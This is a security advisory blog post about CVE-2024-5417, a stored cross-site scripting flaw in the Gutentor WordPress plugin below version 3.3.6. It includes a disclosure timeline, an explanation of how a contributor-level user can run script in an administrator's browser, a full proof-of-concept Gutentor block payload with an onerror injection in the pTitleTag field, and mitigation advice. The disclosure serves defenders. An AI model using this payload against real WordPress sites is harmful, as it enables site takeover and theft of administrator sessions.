CVE-2024-5417 reveals a critical security flaw in the Gutentor plugin, a popular WordPress page builder with over 50,000 installations. This Stored Cross-Site Scripting (XSS) vulnerability enables attackers to inject malicious JavaScript code by exploiting the block embedding process in new posts. The severity of the issue lies in the fact that this vulnerability can be leveraged by a contributor to escalate privileges and create an unauthorized admin account, resulting in full control of the website.
| CVE | CVE-2024-5417 |
| Plugin | Gutentor < 3.3.6 |
| Critical | High |
| All Time | 1 303 450 |
| Active installations | 50 000+ |
| Publicly Published | August 19, 2024 |
| Last Updated | August 19, 2024 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A7: Cross-Site Scripting (XSS) |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5417 https://wpscan.com/vulnerability/fb7d6839-9ccb-4a0f-9dca-d6841f666a1b/ |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
Timeline
| May 24, 2024 | Plugin testing and vulnerability detection in the Gutentor have been completed |
| May 24, 2024 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| August 19, 2024 | Registered CVE-2024-5417 |
Discovery of the Vulnerability
During a routine security assessment, researchers identified a vulnerability within the Gutentor plugin, particularly when a contributor creates a post containing certain Gutentor blocks. The attack vector involves embedding a custom block with a specific payload that takes advantage of the Gutentor plugin’s functionality for adding complex layouts and elements to posts.
The attacker injects a carefully crafted block payload using Gutentor’s block creation options. The PoC payload, <!-- wp:gutentor/p3 {\"gID\":\"gm704fd15\",\"mPID\":\"25f55996-3ee4-4198-beb2-376e26177ed3\"} -->, manipulates settings for features like carousels and buttons within the plugin. By embedding malicious JavaScript, such as img src=x onerror=alert(1), the attacker can create a script that executes when the post is viewed by a site administrator. This attack bypasses standard user permissions and can escalate to full site compromise.
Understanding of Stored XSS attack’s
Cross-Site Scripting (XSS) is a prevalent vulnerability in WordPress due to its extensibility and reliance on third-party plugins like Gutentor. XSS allows attackers to inject and execute malicious code within a website, which can lead to unauthorized actions, theft of sensitive data, or even full control over the website.
Exploiting the Stored XSS Vulnerability
To exploit CVE-2024-5417, an attacker with contributor access creates a new post and embeds a custom Gutentor block with a payload designed to inject malicious JavaScript. The payload manipulates various block options like carousel settings and button typography, and includes the XSS injection via a script in the pTitleTag field, which executes upon the post’s rendering.
POC:
<!-- wp:gutentor/p3 {\"gID\":\"gm704fd15\",\"mPID\":\"25f55996-3ee4-4198-beb2-376e26177ed3\"} -->\n<!-- wp:gutentor/p1 {\"gID\":\"25f55996-3ee4-4198-beb2-376e26177ed3\",\"pName\":\"gutentor/p1\",\"p1CarouselOpt\":{\"enable\":true,\"carouselID\":\"gm704fd15\",\"dots\":false,\"dotsT\":false,\"dotsM\":false,\"arrowNext\":\"fas fa-angle-right\",\"arrowsPrev\":\"fas fa-angle-left\",\"arrowsPosition\":{\"desktop\":\"gutentor-slick-a-default\",\"tablet\":\"gutentor-slick-a-default\",\"mobile\":\"gutentor-slick-a-default\"},\"arrows\":true,\"arrowsT\":true,\"arrowsM\":true,\"infinite\":false,\"speed\":300,\"autoplay\":false,\"draggable\":true,\"pauseOnFocus\":true,\"pauseOnHover\":true,\"autoplaySpeed\":3000,\"slideitem\":{\"desktop\":\"3\",\"tablet\":\"3\",\"mobile\":\"2\"},\"slidescroll\":{\"desktop\":\"3\",\"tablet\":\"3\",\"mobile\":\"2\"},\"cmondesktop\":false,\"cmpaddingdesktop\":\"\",\"cmontablet\":false,\"cmpaddingtablet\":\"\",\"cmonmobile\":false,\"cmpaddingmobile\":\"\"},\"pBtnTypography\":{\"fontType\":\"default\",\"desktopFontSize\":16,\"tabletFontSize\":16,\"mobileFontSize\":16,\"textTransform\":\"normal\"},\"q1BtnTypography\":{\"fontType\":\"default\",\"desktopFontSize\":16,\"tabletFontSize\":16,\"mobileFontSize\":16,\"textTransform\":\"normal\"},\"pOnFeaturedCat\":true,\"pTitleTag\":\"img src=x onerror=alert(1)\",\"pAvatarMargin\":{\"type\":\"px\",\"mTop\":\"-45\",\"mLeft\":\"20\"}} /-->\n<!-- /wp:gutentor/p3 -->____
CVE-2024-5417 poses a high risk for any WordPress site using Gutentor. With over 50,000 active installations, the potential attack surface is significant. A malicious user could take advantage of this vulnerability to gain unauthorized access to sensitive data, create new admin accounts, or manipulate website content.
Recommendations for Improved Security
To mitigate the risk of CVE-2024-5417, it is crucial for website administrators to immediately update to the latest version of Gutentor, as the plugin developers will likely release a patch addressing this issue. Plugin developers must also ensure that input sanitization is enforced on all blocks and elements, preventing malicious scripts from being injected and executed.
Additionally, WordPress administrators should review and restrict contributor permissions, disabling the ability to create or modify complex block types if not necessary. Implementing a security plugin that detects and blocks XSS attacks can also help mitigate such vulnerabilities. Regular security audits of plugins and themes should be part of a proactive security strategy to prevent similar exploits in the future.
By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-5417, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #VeryHighVulnerability
Use CleanTalk solutions to improve the security of your website
ARTYOM K.
